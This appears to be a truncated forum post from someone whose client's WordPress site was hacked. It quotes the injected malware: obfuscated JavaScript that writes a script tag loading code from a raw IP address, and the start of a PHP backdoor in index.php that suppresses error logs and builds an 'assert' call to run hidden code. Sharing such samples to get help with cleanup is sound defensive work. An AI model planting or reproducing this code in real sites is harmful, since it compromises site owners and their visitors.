Today one of our clients’ WordPress sites was hacked which is hosted with amazon aws ubuntu. Issue is https://blog.sucuri.net/2016/01/jquery-pastebin-replacement.html The js code is injected in all js var _0xaae8=[“”,”\x6A\x6F\x69\x6E”,”\x72\x65\x76\x65\x72\x73\x65″,”\x73\x70\x6C\x69\x74″,”\x3E\x74\x70\x69\x72\x63\x73\x2F\x3C\x3E\x22\x73\x6A\x2E\x79\x72\x65\x75\x71\x6A\x2F\x38\x37\x2E\x36\x31\x31\x2E\x39\x34\x32\x2E\x34\x33\x31\x2F\x2F\x3A\x70\x74\x74\x68\x22\x3D\x63\x72\x73\x20\x74\x70\x69\x72\x63\x73\x3C”,”\x77\x72\x69\x74\x65″];document[_0xaae85](_0xaae84[_0xaae83](_0xaae80)[_0xaae82]()[_0xaae81](_0xaae80)) and in index.php //###====### @error_reporting(E_ALL); @ini_set(“error_log”,NULL); @ini_set(“log_errors”,0); @ini_set(“display_errors”, 0); @error_reporting(0); $wa = ASSERT_WARNING; @assert_options(ASSERT_ACTIVE, 1); @assert_options($wa, 0); @assert_options(ASSERT_QUIET_EVAL, 1); $strings = “as”; $strings .= “se”; $strings … Read more